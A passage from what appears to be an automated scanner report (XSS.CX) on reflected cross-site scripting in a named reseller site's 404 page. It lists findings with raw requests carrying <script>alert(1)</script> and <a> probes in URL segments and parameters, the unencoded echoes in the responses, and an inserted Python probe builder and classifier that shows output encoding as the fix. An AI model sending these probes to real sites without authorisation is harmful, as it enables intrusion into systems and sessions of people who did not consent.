This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ef2ff<a>944f4a867e6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ef2ff<a>944f4a867e6 was not found on this server.</p>
...[SNIP]...
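
The following Python is an added example; it is not part of this XSS.CX report and is not code from the scanner that produced it. It reproduces, offline, the two mechanics the findings above rely on: how a "REST URL parameter N" probe is built (the marker is appended to the N-th path segment, so N=1 gives /detail<marker>/35/... and N=7 gives .../search.php<marker>, while an "arbitrarily supplied request parameter" is an extra &<marker>=1 on the query string), and how the response is judged (marker echoed raw, HTML-encoded, percent-encoded as a browser would send < and >, or absent). The function names are this example's own, and fake_404_body() is a constructed stand-in modelled on the 404 page quoted in the report, not the site's code; its escape_output=True branch shows the fix, encoding the URI before output.

```python
import html
import secrets


def make_payload(inner: str = "<script>alert(1)</script>") -> str:
    """Wrap a tag probe in random hex (5 + 11 chars) so the reflection is unambiguous."""
    return secrets.token_hex(3)[:5] + inner + secrets.token_hex(6)[:11]


def build_probe_path(path: str, segment_index: int, payload: str) -> str:
    """Append payload to the segment_index-th (1-based) segment of an absolute path."""
    if not path.startswith("/"):
        raise ValueError("path must be absolute")
    segs = path.split("/")[1:]          # drop the empty element before the leading "/"
    if not 1 <= segment_index <= len(segs):
        raise ValueError(f"path has {len(segs)} segments, not {segment_index}")
    segs[segment_index - 1] += payload
    return "/" + "/".join(segs)


def add_probe_param(query: str, payload: str) -> str:
    """Add a parameter whose *name* is the payload, as in '...&opt=2&<payload>=1'."""
    return f"{query}&{payload}=1" if query else f"{payload}=1"


def classify_reflection(body: str, payload: str) -> str:
    """
    raw         - payload appears verbatim: markup reaches the HTML parser
                  (the 'Certain' <script> findings in this report)
    encoded     - only the &lt;/&gt; form appears: output encoding is in place
    url-encoded - only %3C/%3E appears: the server echoed the raw request line,
                  so a browser-delivered URL (browsers percent-encode < and >)
                  would not yield markup; confirm by hand before rating it
    absent      - no reflection on this page
    """
    if payload in body:
        return "raw"
    if html.escape(payload, quote=False) in body:
        return "encoded"
    if payload.replace("<", "%3C").replace(">", "%3E") in body:
        return "url-encoded"
    return "absent"


def fake_404_body(request_uri: str, escape_output: bool) -> str:
    """
    Constructed stand-in for the 404 page in the report (not the site's code).
    escape_output=False mirrors the observed behaviour: the request URI is
    copied into <p> unmodified. escape_output=True is the fix: HTML-encode
    before output, as PHP's htmlspecialchars() would.
    """
    shown = html.escape(request_uri, quote=True) if escape_output else request_uri
    return ("<html><head><title>Error 404 - Page Not Found</title></head>\n"
            f"<body><p>The requested URL {shown} was not found on this server.</p>"
            "</body></html>")


def check_segment(path: str, query: str, segment_index: int, payload: str,
                  escape_output: bool = False) -> str:
    """Build the probe for one REST URL parameter and classify its reflection."""
    uri = build_probe_path(path, segment_index, payload)
    if query:
        uri += "?" + query
    return classify_reflection(fake_404_body(uri, escape_output), payload)


if __name__ == "__main__":
    path = "/detail/35/themes/kosmos/images/rating/search.php"
    query = "keyword=search...&Submit3=Search&opt=2"
    p = make_payload()
    for n in range(1, 8):
        print(n, build_probe_path(path, n, p), check_segment(path, query, n, p))
    print("with output encoding:", check_segment(path, query, 1, p, escape_output=True))
```

Against a live target, replace fake_404_body() with the body of the real HTTP response to the probe URI; the classification logic is unchanged. A result of "url-encoded" is the case the report's raw-request-line probes cannot distinguish from "raw", and it is the one to settle manually before calling a browser-delivered link exploitable.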

2.2405. http://www.resellerbase.com/detail/35/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f75ed<script>alert(1)</script>402663faa39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf75ed<script>alert(1)</script>402663faa39/35/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf75ed<script>alert(1)</script>402663faa39/35/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2406. http://www.resellerbase.com/detail/35/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 74712<script>alert(1)</script>1cb21979b11 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3574712<script>alert(1)</script>1cb21979b11/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3574712<script>alert(1)</script>1cb21979b11/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2407. http://www.resellerbase.com/detail/35/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a3394<script>alert(1)</script>1c815d22781 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themesa3394<script>alert(1)</script>1c815d22781/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themesa3394<script>alert(1)</script>1c815d22781/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2408. http://www.resellerbase.com/detail/35/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a8c31<script>alert(1)</script>21ae6efe878 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmosa8c31<script>alert(1)</script>21ae6efe878/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmosa8c31<script>alert(1)</script>21ae6efe878/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2409. http://www.resellerbase.com/detail/35/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cf4c5<script>alert(1)</script>0bc6187cf08 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/imagescf4c5<script>alert(1)</script>0bc6187cf08/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/imagescf4c5<script>alert(1)</script>0bc6187cf08/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2410. http://www.resellerbase.com/detail/35/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload fc4f1<script>alert(1)</script>8d85f596fd8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images/search.phpfc4f1<script>alert(1)</script>8d85f596fd8?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/search.phpfc4f1<script>alert(1)</script>8d85f596fd8?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2411. http://www.resellerbase.com/detail/35/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 6616c<a>0974c3c21fe was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/themes/kosmos/images/search.php?keyword=search...&Submit3=Search6616c<a>0974c3c21fe&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/search.php?keyword=search...&Submit3=Search6616c<a>0974c3c21fe&opt=2 was not found on this server.</p>
...[SNIP]...

2.2412. http://www.resellerbase.com/detail/35/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload b92ce<a>e6254f636c9 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/themes/kosmos/images/search.php?keyword=search...b92ce<a>e6254f636c9&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/search.php?keyword=search...b92ce<a>e6254f636c9&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2413. http://www.resellerbase.com/detail/35/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c1031<script>alert(1)</script>ba4e18abcb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&c1031<script>alert(1)</script>ba4e18abcb7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&c1031<script>alert(1)</script>ba4e18abcb7=1 was not found on this server.</p>
...[SNIP]...

2.2414. http://www.resellerbase.com/detail/35/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7fae8<a>f3ea3b79b99 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=27fae8<a>f3ea3b79b99 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=27fae8<a>f3ea3b79b99 was not found on this server.</p>
...[SNIP]...

2.2415. http://www.resellerbase.com/detail/35/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7ab47<script>alert(1)</script>a06e77db8d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7ab47<script>alert(1)</script>a06e77db8d7/35/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7ab47<script>alert(1)</script>a06e77db8d7/35/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2416. http://www.resellerbase.com/detail/35/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2af99<script>alert(1)</script>c34e2d4975 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/352af99<script>alert(1)</script>c34e2d4975/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/352af99<script>alert(1)</script>c34e2d4975/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2417. http://www.resellerbase.com/detail/35/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e7873<script>alert(1)</script>bb9ec1e2cb8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themese7873<script>alert(1)</script>bb9ec1e2cb8/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themese7873<script>alert(1)</script>bb9ec1e2cb8/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2418. http://www.resellerbase.com/detail/35/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 983c5<script>alert(1)</script>dea60f076d9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos983c5<script>alert(1)</script>dea60f076d9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos983c5<script>alert(1)</script>dea60f076d9/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2419. http://www.resellerbase.com/detail/35/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 14edc<script>alert(1)</script>eea026fd428 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/search.php14edc<script>alert(1)</script>eea026fd428?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/search.php14edc<script>alert(1)</script>eea026fd428?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2420. http://www.resellerbase.com/detail/35/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/search.php

Issue detail

